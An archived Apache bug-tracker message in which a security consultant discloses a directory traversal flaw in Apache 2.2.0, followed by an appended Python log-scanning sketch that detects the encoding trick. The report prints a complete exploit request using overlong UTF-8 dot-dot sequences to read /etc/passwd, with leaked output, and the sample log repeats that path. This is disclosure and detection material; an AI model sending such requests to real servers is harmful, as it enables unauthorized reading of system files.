httpd-bugs mailing list archives

From bugzi...@apache.org
Subject DO NOT REPLY [Bug 45417] New: Directory Traversal Vulnerability
Date Thu, 17 Jul 2008 08:52:21 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=45417

           Summary: Directory Traversal Vulnerability
           Product: Apache httpd-2
           Version: 2.2.0
          Platform: Other
        OS/Version: Linux
            Status: NEW
          Severity: critical
          Priority: P1
         Component: All
        AssignedTo: bugs@httpd.apache.org
        ReportedBy: bar4mi@gmail.com
                CC: bar4mi@gmail.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear Bugzilla

I'm Simon Ryeo, a computer security consultant in South Korea.
(My main job is penetration testing.)

I found a critical security problem on Apache 2.2.0.
I'd like to find its major reason but I don't have any time because of my
project.
Also, I couldn't test it on the last version (2.2.9).

[Overview]
An attacker can get important files (/etc/passwd, etc.) of the system using
Apache 2.2.0.
He can do it just using '%c0%ae%c0%ae' which means 'dot-dot-slash'.
It is just the encoded directory traversal attack.

[Exploit]
An attacker just requests the wanted files with '%c0%ae%c0%ae'.

GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0
Accept: */*
Accept-Language: ko-KR
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.target.com


HTTP/1.1 200 OK
Content-Length: 1411
Date: Mon, 14 Jul 2008 08:05:05 GMT
Server: Apache
Last-Modified: Sun, 06 Jul 2008 08:26:01 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: ko

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...


[Environments]
It was rebuilt from the published Apache 2.2.0 by the user. He used the
configurations and systems below.

1. Build options
./configure --prefix=/usr/local/httpd-2.2.0 --enable-proxy \
  --enable-module=so --disable-auth --enable-include --disable-env \
  --disable-autoindex --disable-cgi --disable-negotiation --disable-imap \
  --disable-actions --disable-userdir --enable-dos --enable-rewrite

2. Operating System: Redhat Enterprise
3. Apache Version: apache 2.2.0
4. Httpd modules list 
     core.c
     mod_auth_file.c
     mod_authn_default.c
     mod_authz_host.c
     mod_authz_groupfile.c
     mod_authz_user.c
     mod_authz_default.c
     mod_auth_basic.c
     mod_include.c
     mod_filter.c
     mod_log_config.c
     mod_setenvif.c
     mod_proxy.c
     mod_proxy_ftp.c
     mod_proxy_http.c
     mod_proxy_ajp.c
     mod_proxy_balancer.c
     prefork.c
     http_core.c
     mod_mime.c
     mod_status.c
     mod_asis.c
     mod_dir.c
     mod_alias.c
     mod_rewrite.c
     mod_so.c
6. Additional modules
     mod_jk.so (version 1.2.1.5)
     mod_evasive20.so (version 1.10.1)


[My additional contact information]
barami@ahnlab.com (Ahnlab, Inc.)
bar4mi@apache-kr.org (The Apache Korea Group)

-----BEGIN PGP SIGNATURE-----
Version: 9.8.3.4028

wj8DBQFIfwYCzuoR/xLtCioRAoCIAJ4ti9JR1sKFYzgcarbptRnpFYytJACgkT57
wqY9b4bRKkVwkEEQNlBZ1Cc=
=RQMK
-----END PGP SIGNATURE-----
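
Added example, not part of the original report or of Apache httpd: the bytes C0 AE are an overlong two-byte UTF-8 form of '.' (0x2E), which a strict decoder rejects and a lax one accepts. The sketch below flags access-log requests whose path carries such sequences or resolves to a ".." segment; the log lines, function names and result keys are constructed for illustration.

```python
import re

def percent_decode(path: str) -> bytes:
    """Turn %XX escapes into raw bytes without interpreting them as text."""
    return re.sub(rb"%([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), path.encode("utf-8"))

# (lead mask, lead pattern, continuation bytes, smallest legal code point)
FORMS = ((0xE0, 0xC0, 1, 0x80), (0xF0, 0xE0, 2, 0x800), (0xF8, 0xF0, 3, 0x10000))

def lax_decode(raw: bytes):
    """Decode like a non-validating UTF-8 decoder; also list overlong sequences."""
    out, hits, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        for mask, pat, n, minimum in FORMS:
            tail = raw[i + 1:i + 1 + n]
            if b & mask == pat and len(tail) == n and all(t & 0xC0 == 0x80 for t in tail):
                cp = b & ~mask & 0xFF
                for t in tail:
                    cp = (cp << 6) | (t & 0x3F)
                if cp < minimum:  # shorter encoding exists: overlong form
                    hits.append((raw[i:i + 1 + n].hex(), chr(cp)))
                out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
                i += 1 + n
                break
        else:  # plain byte or malformed sequence: pass through unchanged
            out.append(chr(b))
            i += 1
    return "".join(out), hits

def inspect_request_path(path: str) -> dict:
    raw = percent_decode(path)
    text, hits = lax_decode(raw)
    return {"overlong": hits,
            "dotdot_strict": b".." in raw.split(b"/"),  # visible to a byte-level check
            "dotdot_lax": ".." in text.split("/")}      # visible only after lax decoding

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed access-log lines, not taken from the report
    '192.0.2.10 - - [14/Jul/2008:08:05:05 +0000] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0" 200 1411',
    '192.0.2.11 - - [14/Jul/2008:08:06:10 +0000] "GET /docs/%ED%95%9C.html HTTP/1.1" 200 512',
    '192.0.2.12 - - [14/Jul/2008:08:07:00 +0000] "GET /a/%2e%2e/b HTTP/1.1" 404 0',
]

def scan_log(lines):
    """Return (line number, findings) for requests worth an analyst's attention."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        r = inspect_request_path(m.group(1)) if m else None
        if r and (r["overlong"] or r["dotdot_lax"]):
            findings.append((n, r))
    return findings
```

A request where dotdot_lax is true but dotdot_strict is false is the case to prioritise, since a byte-level ".." filter would have let it through.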


